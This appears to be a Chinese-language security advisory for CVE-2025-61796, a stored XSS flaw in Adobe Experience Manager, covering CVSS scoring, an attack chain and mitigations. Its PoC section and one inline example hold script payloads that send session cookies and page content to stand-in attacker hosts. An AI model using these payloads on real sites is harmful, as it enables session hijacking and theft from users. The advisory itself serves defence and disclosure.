CVE-2025-61796 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61796

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager (AEM)

漏洞概述

CVE-2025-61796是Adobe Experience Manager（AEM）11.6及更早版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Adobe产品安全事件响应团队（PSIRT）发现并报告，于2025年10月14日正式披露。其CVSS 3.1基础评分为5.4分，属于中危级别。

该漏洞的核心问题在于AEM的某些表单字段未对用户输入进行充分的输出编码和过滤，导致低权限攻击者可以将恶意JavaScript代码注入到这些易受攻击的表单字段中。由于属于存储型XSS，恶意脚本会被持久化存储在服务器端，当其他用户（受害者）访问包含该恶意字段的页面时，浏览器会自动执行注入的脚本代码。

此漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L）且需要用户交互（UI:R）。漏洞的作用域已发生变化（S:C），这意味着被攻陷的组件会影响其他安全域。机密性和完整性影响均为低，无可用性影响。

成功利用此漏洞的攻击者可以在受害者的浏览器上下文中执行任意JavaScript代码，可能导致会话劫持、敏感信息窃取、钓鱼攻击或进一步权限提升等后果。由于AEM被广泛应用于企业内容管理和数字体验平台，此漏洞可能对使用AEM的网站和应用程序构成显著安全风险。

技术细节

该漏洞属于典型的存储型XSS漏洞，其技术原理如下：

1. **输入验证缺失**：AEM 11.6及更早版本的某些表单字段在处理用户提交的数据时，未对HTML/JavaScript特殊字符（如<、>、"、'、&等）进行充分的过滤或编码，导致攻击者可以直接提交包含恶意脚本的内容。

2. **存储机制**：攻击者利用低权限账户登录AEM后，通过表单提交将恶意JavaScript代码（如`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`）注入到数据库中。由于缺乏输出编码，这些恶意内容被原样存储。

3. **触发执行**：当受害者浏览包含该恶意字段的页面时，服务器将存储的恶意内容原样返回给浏览器，浏览器将其解析为可执行脚本并自动执行。

4. **作用域变更（S:C）**：CVSS向量中标记了Scope Changed，表示利用该漏洞可以突破AEM组件的安全边界，影响到同一浏览器上下文中的其他安全域或应用程序。

5. **利用条件**：攻击需要低权限认证（PR:L），这意味着默认配置下的注册用户即可发起攻击；同时需要用户交互（UI:R），受害者需要主动访问包含恶意内容的页面或点击恶意链接。

6. **潜在危害**：执行恶意脚本后，攻击者可以窃取用户的会话Cookie、进行钓鱼攻击、篡改页面内容、劫持用户会话，或利用受害者的权限执行未授权操作。

攻击链分析

STEP 1

步骤1：初始访问

攻击者使用低权限账户登录Adobe Experience Manager，利用默认或已获取的凭证获得对AEM表单功能的访问权限。

STEP 2

步骤2：恶意载荷注入

攻击者定位到存在XSS漏洞的表单字段，在输入框中注入精心构造的恶意JavaScript代码（如窃取Cookie的脚本），由于缺乏输入过滤和输出编码，恶意内容被成功提交并存储。

STEP 3

步骤3：载荷持久化

恶意脚本被存储在AEM后端数据库中，与正常内容混合存储，等待受害者访问触发执行。

STEP 4

步骤4：社工诱导

攻击者通过钓鱼邮件、即时消息或其他方式诱导受害者（通常是具有更高权限的用户）点击链接或访问包含恶意内容的页面。

STEP 5

步骤5：脚本执行

受害者的浏览器加载包含恶意字段的页面时，存储的XSS载荷自动执行，在受害者浏览器上下文中运行攻击者的JavaScript代码。

STEP 6

步骤6：数据窃取与权限提升

恶意脚本窃取受害者的会话Cookie、会话令牌或其他敏感信息，攻击者利用这些信息劫持受害者会话，获得更高权限的访问能力，可能导致进一步的数据泄露或系统入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61796 - Adobe Experience Manager Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in AEM form fields -->

<!-- Step 1: Attacker logs into AEM with low-privilege credentials -->
<!-- Step 2: Attacker navigates to a vulnerable form field (e.g., user profile, content authoring form) -->
<!-- Step 3: Attacker injects the following malicious payload into the vulnerable input field -->

<script>
    // Malicious JavaScript payload - exfiltrate session cookies
    var img = new Image();
    img.src = "https://attacker-server.com/collect?cookie=" + encodeURIComponent(document.cookie) + 
              "&url=" + encodeURIComponent(document.location.href) +
              "&referrer=" + encodeURIComponent(document.referrer);
</script>

<!-- Alternative payload using event handlers (if <script> tags are stripped) -->
<img src=x onerror="fetch('https://attacker-server.com/steal',{method:'POST',body:JSON.stringify({cookies:document.cookie,dom:document.body.innerHTML})})">

<!-- Step 4: Payload is stored in the AEM backend database -->
<!-- Step 5: When victim visits the page containing the injected field, the script executes automatically -->
<!-- Step 6: Victim's session data is exfiltrated to attacker's server -->

<!-- Detection/Testing payload (benign) -->
<!-- <script>alert('XSS-CVE-2025-61796')</script> -->
<!-- <img src=x onerror=alert(document.domain)> -->

影响范围

Adobe Experience Manager <= 11.6

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对所有用户输入实施严格的输入验证，拒绝包含HTML/JavaScript特殊字符的输入；2）对所有输出内容进行HTML实体编码，确保用户提交的数据在渲染时被安全转义；3）部署Content Security Policy（CSP）头，限制内联脚本执行；4）使用Web应用防火墙（WAF）配置XSS防护规则，拦截常见的恶意载荷；5）审查并限制低权限用户对表单字段的写入权限；6）监控异常的用户输入和页面内容变更，及时发现潜在攻击。